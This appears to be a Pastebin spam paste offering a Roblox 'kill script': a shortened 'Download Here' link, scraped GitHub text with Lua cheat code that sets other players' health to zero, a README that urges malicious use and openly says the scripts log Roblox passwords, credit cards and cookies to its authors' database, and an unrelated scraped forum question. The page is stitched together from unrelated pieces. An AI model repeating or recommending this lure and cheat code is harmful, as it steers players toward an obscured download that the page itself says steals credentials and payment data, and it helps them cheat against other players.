Advertisement
Guest User

Kill script roblox

a guest
Nov 12th, 2024
832
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.20 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/589dan33 (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. Name already in use
  10. A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
  11. Roblox-Player-Kill-Script / Script
  12. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
  13. 1 contributor
  14. Users who have contributed to this file
  15.  
  16. Open with Desktop
  17. View raw
  18. Copy raw contents Copy raw contents Copy raw contents
  19. This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
  20. -- Gui to Lua -- Version: 3.2 -- Instances: local KillGui = Instance.new("ScreenGui") local Opener = Instance.new("TextButton") local UIGradient = Instance.new("UIGradient") local Frame = Instance.new("ImageLabel") local Player = Instance.new("TextBox") local UIGradient_2 = Instance.new("UIGradient") local Kill = Instance.new("TextButton") local Cancel = Instance.new("TextButton") local LKill = Instance.new("TextButton") local UIGradient_3 = Instance.new("UIGradient") --Properties: KillGui.Name = "KillGui" KillGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") KillGui.ResetOnSpawn = false Opener.Name = "Opener" Opener.Parent = KillGui Opener.BackgroundColor3 = Color3.fromRGB(80, 255, 116) Opener.BackgroundTransparency = 1.000 Opener.BorderSizePixel = 0 Opener.Position = UDim2.new(0.890184641, 0, 0.665688097, 0) Opener.Size = UDim2.new(0, 113, 0, 50) Opener.ZIndex = 2 Opener.Font = Enum.Font.SourceSans Opener.Text = "Open" Opener.TextColor3 = Color3.fromRGB(255, 255, 255) Opener.TextScaled = true Opener.TextSize = 14.000 Opener.TextWrapped = true UIGradient.Color = ColorSequence.new UIGradient.Parent = Opener Frame.Name = "Frame" Frame.Parent = KillGui Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Frame.BackgroundTransparency = 1.000 Frame.Position = UDim2.new(0.753321111, 0, 0.741761386, 0) Frame.Size = UDim2.new(0, 253, 0, 170) Frame.Visible = false Frame.Image = "rbxassetid://2851926732" Frame.ImageColor3 = Color3.fromRGB(72, 255, 96) Frame.ScaleType = Enum.ScaleType.Slice Frame.SliceCenter = Rect.new(12, 12, 12, 12) Player.Name = "Player" Player.Parent = Frame Player.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Player.BackgroundTransparency = 0.750 Player.BorderSizePixel = 0 Player.Position = UDim2.new(0.0967741907, 0, 0.152100846, 0) Player.Size = UDim2.new(0, 200, 0, 50) Player.ZIndex = 2 Player.Font = Enum.Font.FredokaOne Player.PlaceholderText = "Player To Kill" Player.Text = "" Player.TextColor3 = Color3.fromRGB(255, 255, 255) Player.TextScaled = true Player.TextSize = 14.000 Player.TextWrapped = true UIGradient_2.Color = ColorSequence.new UIGradient_2.Parent = Player Kill.Name = "Kill" Kill.Parent = Frame Kill.BackgroundColor3 = Color3.fromRGB(141, 255, 142) Kill.BackgroundTransparency = 1.000 Kill.BorderSizePixel = 0 Kill.Position = UDim2.new(0, 0, 0.700840294, 0) Kill.Size = UDim2.new(0, 73, 0, 50) Kill.ZIndex = 2 Kill.Font = Enum.Font.SourceSans Kill.Text = "Kill" Kill.TextColor3 = Color3.fromRGB(255, 255, 255) Kill.TextScaled = true Kill.TextSize = 14.000 Kill.TextWrapped = true Cancel.Name = "Cancel" Cancel.Parent = Frame Cancel.BackgroundColor3 = Color3.fromRGB(141, 255, 142) Cancel.BackgroundTransparency = 1.000 Cancel.BorderSizePixel = 0 Cancel.Position = UDim2.new(0.705645204, 0, 0.700840294, 0) Cancel.Size = UDim2.new(0, 73, 0, 50) Cancel.ZIndex = 2 Cancel.Font = Enum.Font.SourceSans Cancel.Text = "Cancel" Cancel.TextColor3 = Color3.fromRGB(255, 255, 255) Cancel.TextScaled = true Cancel.TextSize = 14.000 Cancel.TextWrapped = true LKill.Name = "LKill" LKill.Parent = Frame LKill.BackgroundColor3 = Color3.fromRGB(141, 255, 142) LKill.BackgroundTransparency = 1.000 LKill.BorderSizePixel = 0 LKill.Position = UDim2.new(0.342741907, 0, 0.700840294, 0) LKill.Size = UDim2.new(0, 73, 0, 50) LKill.ZIndex = 2 LKill.Font = Enum.Font.SourceSans LKill.Text = "Loopkill" LKill.TextColor3 = Color3.fromRGB(255, 255, 255) LKill.TextScaled = true LKill.TextSize = 14.000 LKill.TextWrapped = true UIGradient_3.Color = ColorSequence.new UIGradient_3.Parent = Frame -- Scripts: local function HJEL_fake_script() -- KillGui.LocalScript local script = Instance.new('LocalScript', KillGui) script.Parent.Opener.MouseButton1Click:Connect(function() script.Parent.Frame.Visible = true end) script.Parent.Frame.Cancel.MouseButton1Click:Connect(function() script.Parent.Frame.Visible = false end) script.Parent.Frame.Kill.MouseButton1Click:Connect(function() game.Players:FindFirstChild(script.Parent.Frame.Player.Text).Character.Humanoid.Health = 0 script.Parent.Frame.Visible = false end) script.Parent.Frame.LKill.MouseButton1Click:Connect(function() while true do game.Players:WaitForChild(script.Parent.Frame.Player.Text).Character.Humanoid.Health = 0 wait(1) end script.Parent.Frame.Visible = false end) end coroutine.wrap(HJEL_fake_script)()
  21. LxxHB/Roblox-Kill-Aura
  22. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
  23. Name already in use
  24. A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
  25. Sign In Required
  26. Please sign in to use Codespaces.
  27. Launching GitHub Desktop
  28. If nothing happens, download GitHub Desktop and try again.
  29. Launching GitHub Desktop
  30. If nothing happens, download GitHub Desktop and try again.
  31. Launching Xcode
  32. If nothing happens, download Xcode and try again.
  33. Launching Visual Studio Code
  34. Your codespace will open once ready.
  35. There was a problem preparing your codespace, please try again.
  36. Latest commit
  37. Git stats
  38. Files
  39. Failed to load latest commit information.
  40. README.md
  41. Please use the script maliciously. LxxHB Scripts are only used to make Roblox Staff wake up.
  42.  
  43. A Roblox script executor is a program that allows users to insert and run custom scripts in Roblox. This tool allows players to execute scripts written in any programming language, including Lua, PHP, and JavaScript.
  44.  
  45. LxxHB scripts allows you to use Roblox benefits that other users can't use, this is bannable but LxxHB scripts provides an anti-ban system that allows you to use the script without getting banned.
  46. The script is also able to find Roblox passwords and log them to our database. The same goes for credit cards, username, age, gender and cookies.
  47. Recommended executors to run LxxHB scripts
  48. Tips to check if our scripts are safe:
  49.  
  50. Analyze the file with VirusTotal
  51. Execute it before opening roblox (Executor will warn you if there is something wrong)
  52.  
  53. Educational Purposes Only
  54. I'm not responsible of how you use LxxHB scripts.
  55. ROBLOX Kill command to kill specified player
  56. I want to make a command that would kill a player you specify.. Let's say I type: kill/Paul. Now I want to kill the player with the name Paul. This is my command Script:
  57. local player = . game.Players.PlayerAdded:connect(function(player) --this gets the player that connected player.Chatted:connect(function(message) --this function executes when the player type into chat --commands are here if player.Name == "TominoCZ" or player.Name == "nathancain" or player.Name == "block100000" then if message == "kill/me" then player.Character.Head:remove() end if message == "ff/me" then if player.Character:findFirstChild("ForceField") then player.Character.ForceField:Destroy() end Instance.new("ForceField").Parent = player.Character end if message == "unff/me" then if player.Character:findFirstChild("ForceField") then player.Character.ForceField:Destroy() end end end end) end)
  58. Now you can see that I already have a command that will kill the play that executed it. But how can I kill a different player by specifying the player's name after the "kill/"? This command script might look too long or not too pro, but atleast I know and understand what it does. So any ideas?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement